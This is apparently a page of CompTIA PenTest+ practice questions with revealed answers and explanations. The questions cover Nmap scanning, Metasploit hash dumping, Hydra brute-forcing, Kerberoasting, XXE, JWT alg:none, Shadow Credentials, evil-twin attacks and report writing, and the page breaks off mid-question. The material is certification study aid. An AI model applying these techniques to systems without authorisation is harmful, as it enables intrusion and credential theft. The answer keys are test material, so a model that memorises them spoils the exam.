CompTIA PenTest+ PT0-002 (PT0-002) — Questions 526-600

993 questions total · 14 pages · All types, answers revealed

Page 8 of 14
526
MCQ · easy

A penetration tester is conducting a vulnerability scan on a web server using Nikto. The scan report lists several findings, including a directory listing vulnerability and outdated server headers. Which type of scanner is Nikto?

A. Network port scanner
B. WordPress vulnerability scanner
C. Web server vulnerability scanner
D. General vulnerability scanner

Answer: C

Nikto specifically scans web servers for vulnerabilities.

Why this answer

Nikto is a web server scanner that tests for misconfigurations, outdated software, and common vulnerabilities. Nessus is a general vulnerability scanner, WPScan is for WordPress, and OpenVAS is also a general vulnerability scanner.

527
MCQ · hard

A penetration tester is reviewing SSL/TLS certificate information for a target domain and wants to discover additional subdomains that share the same certificate. Which resource is best for this purpose?

A. crt.sh
B. Shodan
C. Google Dorks
D. Wayback Machine

Answer: A

crt.sh is a certificate transparency search engine that can reveal subdomains via SSL certificates.

Why this answer

Certificate Transparency logs (e.g., crt.sh) allow searching by domain or certificate fingerprint to find all certificates issued for that domain, often revealing subdomains.

528
MCQ · easy

Which Metasploit command is used to interact with an established session on a compromised host?

A. use
B. sessions
C. exploit
D. run

Answer: B

'sessions' allows interaction with existing sessions.

Why this answer

The sessions command lists and interacts with active sessions.

529
MCQ · medium

A tester needs to brute-force SSH credentials on a target. Which tool is most appropriate for this task?

A. Aircrack-ng
B. Hashcat
C. Hydra
D. John the Ripper

Answer: C

Correct: supports SSH, FTP, HTTP form brute-force online.

Why this answer

Hydra is a versatile online brute-force tool supporting many protocols including SSH.

530
MCQ · hard

A penetration tester is performing a security assessment of a network that uses SNMP. The tester successfully connects to a device using the community string 'public'. Which tool would the tester MOST likely use to enumerate the entire Management Information Base (MIB) tree to extract system information, running processes, and network interfaces?

A. snmp-check
B. MIB Browser
C. snmpwalk
D. Nmap with snmp-brute script

Answer: C

Correct. snmpwalk is the standard tool for walking the MIB tree.

Why this answer

snmpwalk is the correct tool because it uses SNMP GETNEXT requests to systematically traverse the entire Management Information Base (MIB) tree, retrieving all OID values from a device. Given the tester already has a valid community string ('public'), snmpwalk can extract detailed system information, running processes, and network interfaces without needing to guess or brute-force credentials.

Exam trap

The trap here is that candidates confuse snmp-check with snmpwalk, assuming both perform the same MIB traversal, but snmp-check only queries a fixed set of OIDs while snmpwalk recursively retrieves the entire tree.

How to eliminate wrong answers

Option A is wrong because snmp-check is a passive information-gathering tool that queries specific SNMP OIDs for known vulnerabilities and misconfigurations, but it does not perform a full recursive walk of the entire MIB tree. Option B is wrong because a MIB Browser is a graphical tool for browsing MIB structures, but it is not the most likely command-line tool used in a penetration test for bulk enumeration; snmpwalk is the standard CLI utility for this task. Option D is wrong because Nmap with snmp-brute script is used to brute-force SNMP community strings, not to enumerate the MIB tree after a valid community string is already obtained.

531
MCQ · medium

A client review of a penetration test report reveals confusion about why a particular vulnerability exists. The client's security engineer wants to understand the root cause and the exact steps to reproduce the issue. Which section of the report should the tester point the engineer to?

A. Executive Summary
B. Technical Findings
C. Methodology
D. Risk Rating Appendix

Answer: B

This section includes in-depth vulnerability descriptions, root cause analysis, reproduction steps, and remediation guidance.

Why this answer

The Technical Findings section provides the detailed, step-by-step reproduction steps and root cause analysis that the security engineer needs. This section includes specific commands, payloads, and configurations that led to the vulnerability, enabling the engineer to understand and verify the issue. The Executive Summary and Methodology sections do not contain this level of technical detail.

Exam trap

The trap here is that candidates confuse the purpose of the Methodology section (which describes the testing process) with the Technical Findings section (which contains the actual vulnerability details and reproduction steps).

How to eliminate wrong answers

Option A is wrong because the Executive Summary is a high-level overview intended for non-technical stakeholders, summarizing business risks and key findings without providing reproduction steps or root cause details. Option C is wrong because the Methodology section describes the overall testing approach, tools, and scope, but does not include the specific vulnerability reproduction steps or root cause analysis.

532
MCQ · easy

Refer to the exhibit. A penetration tester has performed a basic Nmap scan and found an open MySQL service. Which of the following should the tester do NEXT to further investigate the MySQL service?

A. Perform a UDP scan on port 3306
B. Connect to the MySQL service using default credentials
C. Run a version detection scan using -sV on port 3306
D. Scan for other hosts with port 3306 open

Answer: C

Version detection reveals the MySQL version, aiding vulnerability assessment.

Why this answer

Option C is correct because the next logical step after discovering an open MySQL service (port 3306) is to perform version detection using `-sV` in Nmap. This identifies the exact MySQL version, which is critical for determining known vulnerabilities (CVEs) and appropriate exploitation techniques. Without version information, the tester cannot assess whether the service is outdated or misconfigured.

Exam trap

The trap here is that candidates may think default credential testing (Option B) is the immediate next step, but the PT0-002 exam emphasizes systematic information gathering—version detection must precede exploitation attempts to avoid unnecessary noise or failed attacks.

How to eliminate wrong answers

Option A is wrong because MySQL runs over TCP, not UDP; port 3306 is a TCP port, and a UDP scan would be irrelevant and waste time. Option B is wrong because attempting default credentials without first identifying the MySQL version or understanding the authentication mechanism is premature and could alert the target or lock out accounts. Option D is wrong because scanning for other hosts with port 3306 open is a broad reconnaissance step that should occur after understanding the current target's service details, not before.

533
MCQ · easy

A penetration tester is writing the executive summary of a penetration test report. Which of the following elements is MOST important to include for a non-technical audience?

A. Detailed list of all ports and services found
B. CVSS scores for every vulnerability
C. A high-level summary of the overall risk and key findings
D. Raw tool output from vulnerability scans

Answer: C

This provides the essential overview that executives need to understand the test's outcome and make informed decisions.

Why this answer

C is correct because the executive summary is intended for a non-technical audience, such as senior management or stakeholders, who need a concise overview of the organization's security posture. A high-level summary of the overall risk and key findings communicates the business impact and strategic priorities without overwhelming them with technical details. This aligns with the PT0-002 objective of tailoring communication to the audience, ensuring the report drives decision-making rather than technical analysis.

Exam trap

The trap here is that candidates often confuse the executive summary with the technical report, assuming that including raw data like port lists or CVSS scores demonstrates thoroughness, when in fact the exam tests the ability to tailor content to the audience's technical level.

How to eliminate wrong answers

Option A is wrong because a detailed list of all ports and services found is too granular for a non-technical audience; it belongs in the technical findings or appendices, where system administrators can act on it. Option B is wrong because CVSS scores for every vulnerability are numerical metrics that require context to interpret; non-technical readers may not understand the scoring methodology or its implications, and presenting all scores without prioritization can obscure the overall risk picture.

534
Multi-Select · easy

A penetration tester is using Metasploit to exploit a remote Windows service. After a successful exploit, the tester gets a meterpreter session. Which TWO commands can the tester use to gather system information and credentials?

Select 2 answers
A. hashdump
B. shell
C. upload
D. getuid
E. sysinfo

Answers: A, D

Dumps password hashes from the SAM database.

Why this answer

getuid and hashdump are meterpreter commands for user information and credential dumping. sysinfo also works, but getuid is more specific to the user. The question asks for TWO, so getuid and hashdump are correct.

535
Multi-Select · medium

A penetration tester is writing a Bash script to automate scanning of multiple subnets with Nmap and parse the output. Which three features are commonly used in such a script? (Choose THREE.)

Select 3 answers
A. PowerShell cmdlets
B. Nmap XML output (-oX)
C. For loop
D. grep
E. PySerial

Answers: B, C, D

XML output is machine-parseable for further processing.

Why this answer

B is correct because Nmap's XML output (-oX) provides structured, machine-parseable data that a Bash script can easily process with tools like grep, sed, or XML parsers (e.g., xmllint). This allows the penetration tester to extract specific fields (e.g., open ports, service versions) reliably across multiple subnets, avoiding the fragility of parsing human-readable text output.

Exam trap

The trap here is that candidates may confuse cross-platform scripting features (like PowerShell cmdlets) with Bash-native constructs, or mistakenly think PySerial is relevant for network scanning, when the exam focuses on Bash-specific tools (for loops, grep) and Nmap's structured output (-oX) for automation.

536
MCQ · medium

During a penetration test, a penetration tester discovers a critical vulnerability that could allow an attacker to gain administrative access to the client's payment processing server. According to best practices, what should the tester do?

A. Exploit the vulnerability to demonstrate impact and document it
B. Wait until the end of the test to include it in the final report
C. Immediately notify the client point of contact
D. Ask the client for permission to continue testing

Answer: C

Immediate notification allows the client to mitigate the risk promptly.

Why this answer

Option C is correct because when a critical vulnerability that could compromise a payment processing server is discovered during a penetration test, the tester must immediately notify the client point of contact (POC) per responsible disclosure and incident response best practices. This allows the client to take urgent mitigating actions, such as applying patches or isolating the server, before the vulnerability is exploited by malicious actors. Delaying notification violates ethical guidelines and could lead to severe financial and reputational damage.

Exam trap

The trap here is that candidates may think exploiting the vulnerability to demonstrate impact (Option A) is necessary for a convincing report, but the PT0-002 exam emphasizes that immediate notification of critical findings takes precedence over demonstration to prevent real-world harm.

How to eliminate wrong answers

Option A is wrong because exploiting the vulnerability without prior authorization, even for demonstration, could cause unintended service disruption or data corruption on a live payment processing server, violating the rules of engagement and potentially the Computer Fraud and Abuse Act (CFAA). Option B is wrong because waiting until the end of the test to report a critical vulnerability leaves the client exposed to exploitation during the testing period, which contradicts the principle of responsible disclosure and could result in a breach. Option D is wrong because asking for permission to continue testing after discovering a critical vulnerability is redundant; the tester already has permission to test, and the immediate priority is to alert the client to the risk, not to seek further authorization.

537
MCQ · medium

A tester wants to perform an evil twin attack to capture WPA handshakes. Which tool from the Aircrack-ng suite is used to deauthenticate clients from a legitimate AP to force reconnection to the rogue AP?

A. airmon-ng
B. airodump-ng
C. aircrack-ng
D. aireplay-ng

Answer: D

Correct: injects deauth packets to disconnect clients.

Why this answer

aireplay-ng can send deauthentication packets to disconnect clients, facilitating handshake capture.

538
MCQ · medium

A penetration tester is using Nmap to perform host discovery on a target network 192.168.1.0/24. The tester wants to identify live hosts without scanning ports. Which Nmap command should be used?

A. nmap -A 192.168.1.0/24
B. nmap -sS 192.168.1.0/24
C. nmap -sV 192.168.1.0/24
D. nmap -sn 192.168.1.0/24

Answer: D

Ping sweep discovers live hosts without port scanning.

Why this answer

Option D is correct because the `-sn` flag in Nmap performs a ping sweep (host discovery) without scanning any ports. It sends ICMP echo requests, TCP SYN to port 443, TCP ACK to port 80, and ICMP timestamp requests by default to determine which hosts are alive on the 192.168.1.0/24 network, making it the ideal choice for identifying live hosts without port scanning.

Exam trap

The trap here is that candidates often confuse `-sn` with `-sS` or `-A`, mistakenly thinking that a stealth scan or aggressive scan is needed for host discovery, when in fact `-sn` is the dedicated, port-free host discovery option.

How to eliminate wrong answers

Option A is wrong because `-A` enables aggressive scanning, which includes OS detection, version detection, script scanning, and traceroute — all of which involve port scanning and are not limited to host discovery. Option B is wrong because `-sS` performs a TCP SYN stealth scan, which scans ports on each host to determine their state, not just host discovery. Option C is wrong because `-sV` performs version detection on open ports, which requires an initial port scan and thus does not meet the requirement of identifying live hosts without scanning ports.

539
MCQ · medium

A tester wants to perform a Kerberoasting attack against an Active Directory environment. Which Impacket tool would be most appropriate?

A. wmiexec
B. psexec
C. secretsdump
D. GetUserSPNs

Answer: D

GetUserSPNs is designed for Kerberoasting.

Why this answer

GetUserSPNs is the correct Impacket tool for Kerberoasting because it queries Active Directory for Service Principal Names (SPNs) associated with user accounts, then requests TGS tickets for those services. These tickets can be cracked offline to recover the service account's password, enabling privilege escalation.

Exam trap

The exam often tests the distinction between tools that extract hashes (secretsdump) and tools that request Kerberos tickets (GetUserSPNs), leading candidates to confuse hash dumping with Kerberoasting.

How to eliminate wrong answers

Option A is wrong because wmiexec is used for remote command execution via Windows Management Instrumentation (WMI), not for extracting Kerberos tickets. Option B is wrong because psexec executes commands remotely using SMB and service creation, not for Kerberoasting. Option C is wrong because secretsdump extracts password hashes from the SAM, NTDS.dit, and LSA secrets, but does not perform Kerberos TGS ticket requests or SPN enumeration.

540
Multi-Select · medium

A penetration tester is exploiting a web application and discovers an endpoint that allows an attacker to read arbitrary files on the server by manipulating XML input. The application uses an XML parser that does not disable external entities. Which TWO attacks can the tester perform using this vulnerability? (Choose TWO.)

Select 2 answers
A. SSRF via XXE
B. File read via XXE
C. Command injection
D. SQL injection
E. XSS

Answers: A, B

XXE can be used to make server-side requests to internal resources (SSRF).

Why this answer

XXE (XML External Entity) allows file reads and can also lead to SSRF if the entity points to an internal URL. Command injection typically requires different input. SQL injection needs SQL syntax. XSS is client-side.

541
Multi-Select · medium

Which THREE of the following are best practices when communicating findings to stakeholders during a penetration test?

Select 3 answers
A. Share raw exploit code and logs without sanitization
B. Provide regular status updates to the client point of contact
C. Always include full technical details in every communication
D. Notify the client immediately upon discovering a critical vulnerability
E. Adjust the level of technical detail based on the audience

Answers: B, D, E

Keeps client informed.

Why this answer

Options B, D, and E are correct. Regular status updates (B) keep stakeholders informed. Immediate notification of critical findings (D) allows timely action. Tailoring communication to the audience (E) ensures understanding. Option C is wrong because technical details may be omitted for a non-technical audience. Option A is wrong because evidence should be sanitized, not shared raw.

542
MCQ · easy

A penetration tester is conducting passive reconnaissance on a target organization. The tester wants to identify all publicly accessible cloud storage buckets that might belong to the target without directly interacting with the target's infrastructure. Which of the following techniques would be most effective for this purpose?

A. Perform DNS enumeration using tools like `dnsrecon` to discover subdomains pointing to cloud storage services
B. Search for exposed cloud storage buckets using search engine dorks (e.g., 'site:s3.amazonaws.com target-company')
C. Query certificate transparency logs to find SSL certificates issued to the target's cloud storage endpoints
D. Perform a WHOIS lookup to find IP ranges owned by the target and then scan those ranges for open storage services

Answer: B

Search engine dorks are a passive technique that relies on cached indexes of cloud storage buckets that are misconfigured and publicly accessible, without sending any traffic to the target.

Why this answer

Option B is correct because search engine dorks allow a penetration tester to query publicly indexed content on cloud storage platforms like AWS S3 without sending any traffic to the target's infrastructure. By using a dork such as 'site:s3.amazonaws.com target-company', the tester leverages the search engine's pre-cached index to identify buckets that may be misconfigured or publicly accessible, which aligns perfectly with passive reconnaissance requirements.

Exam trap

The trap here is that candidates may confuse passive reconnaissance with techniques that appear passive but actually generate direct network queries (like DNS enumeration), or they may overlook that certificate transparency logs reveal domains, not storage buckets, leading them to choose a technically passive but functionally irrelevant option.

How to eliminate wrong answers

Option A is wrong because DNS enumeration with tools like `dnsrecon` involves actively querying DNS servers, which generates network traffic to the target's authoritative name servers or resolvers, making it an active reconnaissance technique rather than passive. Option C is wrong because querying certificate transparency logs (e.g., via crt.sh) is a passive technique, but it reveals SSL certificates and domain names, not cloud storage buckets; it does not directly identify publicly accessible storage endpoints like S3 buckets.

543
Multi-Select · medium

A penetration tester is conducting a web application test and finds a parameter that is vulnerable to XXE. Which THREE of the following actions can the tester perform using XXE?

Select 3 answers
A. Execute SQL injection
B. Cause a denial of service
C. Read sensitive files from the server
D. Perform SSRF to internal services
E. Bypass authentication

Answers: B, C, D

XXE can be used for billion laughs attack or other DoS.

Why this answer

XXE can read files, perform SSRF, and cause denial of service. SQL injection is not typically a direct result of XXE.

544
MCQ · medium

A penetration tester is prioritizing remediation recommendations in a report. Which of the following should be considered first?

A. Vulnerabilities that require significant code changes first.
B. Vulnerabilities with the lowest CVSS scores to clear many issues quickly.
C. Critical and high severity vulnerabilities, especially those that are easy to fix.
D. All vulnerabilities in the order they were discovered.

Answer: C

This addresses the highest risk and provides quick wins.

Why this answer

Critical and high severity vulnerabilities that pose immediate risk should be prioritized first, along with quick wins that can be implemented rapidly.

545
MCQ · medium

A penetration tester is analyzing a Bash script that performs network scanning. The script contains the following command: `for ip in $(seq 1 254); do hping3 -S -p 22 -c 1 $TARGET_SUBNET.$ip 2>/dev/null | grep -q "flags=SA" && echo "$TARGET_SUBNET.$ip: open"; done`. What is the primary purpose of this script?

A. Conduct a TCP SYN scan to identify hosts with port 22 open
B. Perform a vulnerability assessment against SSH services
C. Execute an ICMP ping sweep to discover live hosts
D. Complete a full TCP three-way handshake and log successful connections

Answer: A

The script sends SYN packets to port 22 and looks for SYN-ACK responses, which is the definition of a TCP SYN scan.

Why this answer

The script uses hping3 with the -S flag (SYN) and -p 22 (port 22) to send TCP SYN packets to each IP in the target subnet. The grep -q 'flags=SA' checks for a SYN-ACK response, which indicates the port is open and listening. This is the classic behavior of a TCP SYN scan (half-open scan) to identify hosts with port 22 open.

Exam trap

The trap here is that candidates may confuse a TCP SYN scan on a specific port with a general ICMP ping sweep, or assume that scanning port 22 automatically implies an SSH vulnerability assessment, when in fact the script only performs port discovery, not vulnerability testing.

How to eliminate wrong answers

Option B is wrong because the script does not perform any vulnerability assessment; it only checks if port 22 is open (SYN-ACK received) and does not attempt to exploit or enumerate SSH service versions or vulnerabilities. Option C is wrong because the script uses TCP SYN packets to port 22, not ICMP echo requests (ping), so it is not an ICMP ping sweep; it specifically targets a single TCP port to identify live hosts with that port open.

546
MCQ · medium

A penetration testing firm is scoping a test for a financial institution. The client insists that the test only be performed on systems located in the corporate headquarters, excluding cloud-based infrastructure and remote branch offices. Which of the following should the penetration tester emphasize during the scoping discussion?

A. The test will include social engineering of remote employees
B. The exclusion of cloud infrastructure may leave critical assets untested
C. The test can only be performed during off-hours
D. The tester will require VPN access to the corporate network

Answer: B

Correct. Emphasizing the risk of untested critical assets helps the client understand the scope limitation's impact on overall security assurance.

Why this answer

Option B is correct because the client's exclusion of cloud-based infrastructure and remote branch offices creates a significant gap in the test scope. A penetration test that ignores cloud assets (e.g., AWS, Azure, or SaaS applications) may miss critical vulnerabilities in systems that process or store sensitive financial data, as these are often part of the institution's attack surface. The tester must emphasize that such exclusions can lead to a false sense of security, as attackers frequently target cloud and remote assets due to their accessibility and potential misconfigurations.

Exam trap

The trap here is that candidates may focus on operational details like timing or social engineering, rather than recognizing that scope exclusions (especially cloud) directly undermine the test's ability to assess the full attack surface, which is a core principle of scoping in PT0-002.

How to eliminate wrong answers

Option A is wrong because social engineering of remote employees is a separate attack vector that does not address the core scoping issue of excluding cloud and branch office systems; the client's restriction is on the systems tested, not the methods used. Option C is wrong because the timing of the test (off-hours vs. business hours) is a separate operational consideration, not a direct response to the client's exclusion of cloud and branch infrastructure; the primary scoping concern is the incomplete coverage of the attack surface, not the schedule.

547
MCQ · easy

During a web application test, a penetration tester needs to intercept and modify HTTP requests before forwarding them to the server. Which tool is best suited for this task?

A. Hydra
B. Nmap
C. Wireshark
D. Burp Suite

Answer: D

Burp Suite's proxy is designed for intercepting and modifying requests.

Why this answer

Burp Suite's proxy allows intercepting and modifying HTTP/S requests, making it the standard tool for web application testing.

548
MCQ · easy

A penetration tester wants to crack NTLM hashes obtained from a Windows system. Which Hashcat mode should be used?

A. -m 1000
B. -m 22000
C. -m 0
D. -m 13100

Answer: A

Mode 1000 corresponds to NTLM.

Why this answer

Hashcat mode 1000 is for NTLM hashes.

549
MCQ · hard

During a penetration test, a tester uses Metasploit to exploit a Windows service and gets a meterpreter session. The tester wants to dump hashes from the compromised system. Which meterpreter command should be used?

A. hashdump
B. shell
C. sysinfo
D. getsystem

Answer: A

hashdump extracts password hashes from the SAM.

Why this answer

The hashdump command in meterpreter dumps the SAM database hashes.

550
MCQ · medium

A penetration tester has compromised a Windows workstation and obtained a low-privileged domain user account. The tester discovers that this user belongs to a group that has the 'GenericWrite' privilege over a computer object in Active Directory. Which attack is most directly enabled by this misconfiguration?

A. Kerberoasting
B. Shadow Credentials
C. AS-REP Roasting
D. DCSync Attack

Answer: B

With GenericWrite over a computer object, the tester can write to the msDS-KeyCredentialLink attribute to add a rogue key credential, enabling a Shadow Credentials attack to request a TGT for the computer account.

Why this answer

The 'GenericWrite' privilege over a computer object allows the attacker to write to the msDS-KeyCredentialLink attribute of that object. By adding a rogue key credential, the attacker can trigger the Key Distribution Center (KDC) to accept a certificate-based authentication, enabling the Shadow Credentials attack to obtain a TGT for the computer account and escalate privileges.

Exam trap

The trap here is that candidates confuse the GenericWrite privilege with the ability to perform Kerberoasting or AS-REP Roasting, but those attacks require different preconditions (SPN or no pre-authentication) and do not directly exploit write access to computer object attributes.

How to eliminate wrong answers

Option A is wrong because Kerberoasting requires the attacker to have a valid TGT for a domain user and targets service accounts with SPNs, not computer objects with GenericWrite. Option C is wrong because AS-REP Roasting targets user accounts that do not require Kerberos pre-authentication, not computer objects, and does not leverage GenericWrite over an object.

551
MCQ · easy

During the information gathering phase, a penetration tester wants to discover subdomains of a target domain using DNS queries and potentially brute-forcing common subdomain names. Which of the following tools is specifically designed for subdomain enumeration and can perform both passive and active techniques?

A. Nmap
B. dirsearch
C. Gobuster
D. Amass

Answer: D

Amass is a subdomain enumeration tool that integrates passive sources and active techniques.

Why this answer

Amass is a tool that performs subdomain enumeration using passive sources and active brute-forcing. Gobuster and dirsearch are for directory/file enumeration. Nmap is for port scanning.

552
MCQ · easy

A penetration tester is writing the findings section of a report. The tester identified a critical SQL injection vulnerability that allows extraction of the entire customer database. The client's technical team has already remediated the issue. How should the tester present this finding to ensure clarity and usefulness?

A. Include the vulnerability with the risk rating, a brief description, and a note that it was remediated during the test
B. Exclude the vulnerability from the report because it has already been fixed
C. Document the vulnerability in full, including reproduction steps, impact, and evidence, and note the remediation status
D. Reduce the risk rating of the vulnerability because it has been fixed, and include it in an appendix

Answer: C

This approach ensures the report is complete and useful for the client's records, compliance, and future prevention. The remediation status provides closure.

Why this answer

Option C is correct because penetration testing standards (e.g., PTES, OWASP) require full documentation of all findings regardless of remediation status. Including reproduction steps, impact analysis, and evidence ensures the report serves as a permanent record for compliance, audit, and future reference. Noting the remediation status provides clear context that the issue has been resolved, which is critical for stakeholders who need to verify the fix.

Exam trap

The trap here is that candidates mistakenly think remediated vulnerabilities should be omitted or minimized, but the PT0-002 exam expects full documentation to maintain report integrity and support post-remediation validation.

How to eliminate wrong answers

Option A is wrong because it omits essential technical details such as reproduction steps and evidence, which are necessary for validating the remediation and for legal/regulatory compliance. Option B is wrong because excluding a remediated vulnerability violates reporting best practices and can lead to incomplete audit trails, making it impossible to prove the issue was ever addressed.

553
MCQ · medium

During a penetration test, the tester discovers a JWT token that uses the 'alg:none' header. Which attack does this vulnerability enable?

A. Key confusion attack
B. Signature bypass using alg:none
C. Algorithm substitution attack
D. Timing attack

Answer: B

alg:none means no signature is required.

Why this answer

JWT with 'alg:none' allows an attacker to forge tokens without any signature, bypassing verification.

554
MCQ · hard

After completing a penetration test, the lead tester is preparing the executive summary. The client's CISO wants to understand the business impact of a critical vulnerability found in the customer-facing web application. Which of the following is the BEST way to convey this in the report?

A.List the CVSS score and exploitability metrics
B.Describe the attack scenario and potential financial loss
C.Provide the raw log entries showing the exploitation
D.Recommend a specific patch version
AnswerB

Correct. This explains the real-world consequences in business terms, which is most relevant for an executive summary.

Why this answer

Option B is correct because the executive summary must communicate business risk, not technical details. Describing the attack scenario and potential financial loss directly addresses the CISO's need to understand the business impact, such as revenue loss from a data breach or regulatory fines. This aligns with the PT0-002 objective of tailoring reports to the audience, where executives require risk context rather than exploit mechanics.

Exam trap

The trap here is that candidates confuse technical severity (CVSS) with business impact, assuming a high CVSS score inherently conveys business risk, but the CISO explicitly needs the financial and operational consequences, not just the score.

How to eliminate wrong answers

Option A is wrong because listing the CVSS score and exploitability metrics provides a technical severity rating but does not translate that into business impact (e.g., dollar amounts or reputational harm), which the CISO specifically requested. Option C is wrong because providing raw log entries showing exploitation is operational evidence for technical teams, not a summary for executive decision-making; it fails to convey the broader business consequences.

555
MCQmedium

A penetration tester is analyzing a Python script that uses the requests library to automate web vulnerability scanning. The script sends POST requests with payloads but receives 403 Forbidden responses for many requests, even though manual testing with the same payloads works. Which is the most likely cause?

A.Missing User-Agent header
B.Incorrect Content-Type header
C.Script is sending too many requests too fast
D.Payloads are URL-encoded incorrectly
AnswerA

Many WAFs block requests that lack a common browser User-Agent, flagging them as automated. Adding a realistic User-Agent often resolves 403 errors.

Why this answer

Option A is correct because many web servers and WAFs (Web Application Firewalls) block requests that lack a User-Agent header or carry a known tool signature; the requests library sends 'python-requests/<version>' unless the script overrides it. Manual testing goes through a browser, which sends a legitimate User-Agent, while the script's default header triggers the 403 Forbidden response. Setting a realistic User-Agent (and, for stricter rules, the Accept and Accept-Language headers a browser would send) in the script mimics browser behaviour and gets past this common filter.

Exam trap

CompTIA often tests the misconception that 403 errors are always due to rate limiting or authentication issues, but here the trap is that the script's default User-Agent header is the root cause, not request frequency or content type.

How to eliminate wrong answers

Option B is incorrect because an incorrect Content-Type header would typically cause a 400 Bad Request or 415 Unsupported Media Type, not a 403 Forbidden, and the payloads work manually, so the Content-Type is likely correct. Option C is incorrect because rate limiting usually results in 429 Too Many Requests or connection timeouts, not a consistent 403 Forbidden on every request; the issue is with the request's identity, not its frequency.
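A small model of the two rules the question contrasts, as an added example that is not part of the original question set: an identity rule that returns 403 for a missing or tool-signature User-Agent, and a separate rate rule that returns 429. The rule set is constructed to resemble common WAF defaults and is not any vendor's real configuration; the browser header profile is the kind of dict you would pass as headers= to requests.post().

```python
from collections import Counter

# Constructed rule set modelled on common WAF defaults; not any vendor's real configuration.
TOOL_UA_PREFIXES = ("python-requests/", "python-urllib/", "curl/", "wget/", "go-http-client/")
RATE_LIMIT_PER_WINDOW = 20   # requests per client per window before the rate rule answers 429

# Header profile a browser would send; pass this as headers= to requests.post() in the script.
BROWSER_HEADERS = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                  "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.9",
}


def _user_agent(headers: dict) -> str:
    # Header names are case-insensitive; normalise before matching.
    return next((v for k, v in headers.items() if k.lower() == "user-agent"), "")


class MiniWaf:
    """Two independent rules: request identity (403) and request rate (429)."""

    def __init__(self):
        self.hits = Counter()

    def decide(self, client_ip: str, headers: dict) -> int:
        ua = _user_agent(headers)
        if not ua or ua.lower().startswith(TOOL_UA_PREFIXES):
            return 403                      # automation signature: blocked on every request, any rate
        self.hits[client_ip] += 1
        if self.hits[client_ip] > RATE_LIMIT_PER_WINDOW:
            return 429                      # too many requests: a different status from a different rule
        return 200


def simulate(headers: dict, count: int) -> list:
    """Send `count` requests with the same headers from one client; return the status codes in order."""
    waf = MiniWaf()
    return [waf.decide("203.0.113.10", headers) for _ in range(count)]
```

Run simulate() with the requests default header and with BROWSER_HEADERS: the first is 403 from the very first request, the second is 200 until the rate rule trips, at which point the code changes to 429. A consistent 403 on every request therefore points at identity, not frequency, which is the reasoning behind eliminating Option C.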

556
MCQeasy

A penetration tester is performing passive reconnaissance to discover email addresses associated with a target domain. The tester wants to avoid sending any packets directly to the target's infrastructure. Which tool is most appropriate for this task?

A.Using the whois command to query domain registration details
B.Using Shodan to identify email servers and associated addresses
C.Using Google dorking with advanced search queries to find email addresses in indexed pages
D.Using theHarvester to search public sources like search engines, PGP key servers, and social media
AnswerD

TheHarvester is a passive reconnaissance tool that aggregates email addresses, subdomains, and other information from multiple public sources without sending traffic to the target, making it ideal for this scenario.

Why this answer

TheHarvester is designed specifically for passive reconnaissance, gathering email addresses, subdomains, and other data from public sources such as search engines, PGP key servers, and social media, so the queries go to those third parties rather than to the target. One caveat: its optional DNS brute-force and resolution features do contact the target's name servers, so they must be left off for a purely passive run.

Exam trap

CompTIA often tests the distinction between passive and active reconnaissance, and the trap here is that candidates may confuse 'passive' with 'using public sources' and incorrectly choose Google dorking (Option C) because it seems passive, but theHarvester is the dedicated tool that systematically aggregates email addresses from multiple public sources, making it the most appropriate for this specific task.

How to eliminate wrong answers

Option A is wrong because whois queries registry and registrar WHOIS servers, not the target's infrastructure, so it is passive, but it returns registration contacts at best (often only a privacy-proxy address), not the organisation's email addresses. Option B is wrong because, although querying Shodan is passive from the tester's side (Shodan did the scanning, not the tester), it catalogs exposed services and banners, not email addresses. Option C is wrong because Google dorking is passive but manual and single-source; theHarvester automates the same kind of discovery across several public sources at once.

557
MCQhard

A penetration tester has discovered a web application that appears to be built with WordPress. The tester wants to identify installed plugins, themes, and potential vulnerabilities without triggering intrusion detection systems. Which tool is BEST suited for this task?

A.OpenVAS
B.Nikto
C.WPScan
D.Gobuster
AnswerC

Correct. It is purpose-built for WordPress security assessment.

Why this answer

WPScan is a dedicated WordPress vulnerability scanner that can enumerate plugins, themes, users, and known vulnerabilities. It can be configured to use passive methods or throttle requests to avoid detection.

558
MCQmedium

A penetration tester is writing the executive summary of a report. Which of the following is MOST important to include?

A.Overall risk rating and strategic recommendations
B.Step-by-step exploitation commands
C.Raw tool output and screenshots
D.Detailed CVSS scores for every vulnerability
AnswerA

The executive summary should present the big picture in business language.

Why this answer

The executive summary should provide a high-level overview in business language, including the overall risk rating, key findings, and strategic recommendations.

559
MCQeasy

A penetration tester wants to use Metasploit to exploit a remote service. After selecting an exploit module, which command is used to set the remote host IP address?

A.set LHOST
B.set RHOSTS
C.set TARGET
D.set LPORT
AnswerB

RHOSTS sets the remote host(s) for exploitation.

Why this answer

In Metasploit, 'set RHOSTS' is used to specify the target IP address.

560
MCQeasy

During a penetration test, a tester needs to perform a man-in-the-middle attack on a network that uses WPA2-Enterprise with PEAP. Which tool is most appropriate for capturing the authentication handshake to attempt offline cracking?

A.Wireshark
B.aircrack-ng
C.Ettercap
D.hostapd-wpe
AnswerD

hostapd-wpe sets up a rogue access point that captures the EAP-MSCHAPv2 challenge/response from PEAP clients for offline cracking.

Why this answer

hostapd-wpe (Wireless Pwnage Edition) is specifically designed to set up a rogue access point that impersonates a legitimate WPA2-Enterprise network. It captures the MSCHAPv2 challenge-response from the PEAP authentication handshake, which can then be used for offline dictionary or brute-force attacks against the user's credentials. Unlike other tools, hostapd-wpe handles the full EAP/PEAP exchange required for this attack.

Exam trap

The trap here is that candidates often confuse aircrack-ng's ability to capture WPA2-PSK handshakes with the different requirements of WPA2-Enterprise, where the attack targets the MSCHAPv2 credentials rather than the 4-way handshake.

How to eliminate wrong answers

Option A is wrong because Wireshark is a packet analyzer that can capture traffic but cannot perform a man-in-the-middle attack or initiate an authentication handshake; it lacks the ability to set up a rogue AP. Option B is wrong because aircrack-ng is used for cracking WPA/WPA2-PSK (pre-shared key) handshakes, not WPA2-Enterprise with PEAP, which uses EAP-MSCHAPv2 and requires a different attack vector. Option C is wrong because Ettercap is a network sniffing and MITM tool for LAN-based attacks (e.g., ARP spoofing), but it does not support 802.11 wireless rogue AP setup or EAP/PEAP handshake capture.

561
MCQeasy

A penetration testing firm is hired to assess a client's web application that integrates with a third-party payment processor's API. The client wants to include the payment processor's API in the test scope. Which action should the tester take FIRST?

A.Begin testing the API because it is part of the client's environment
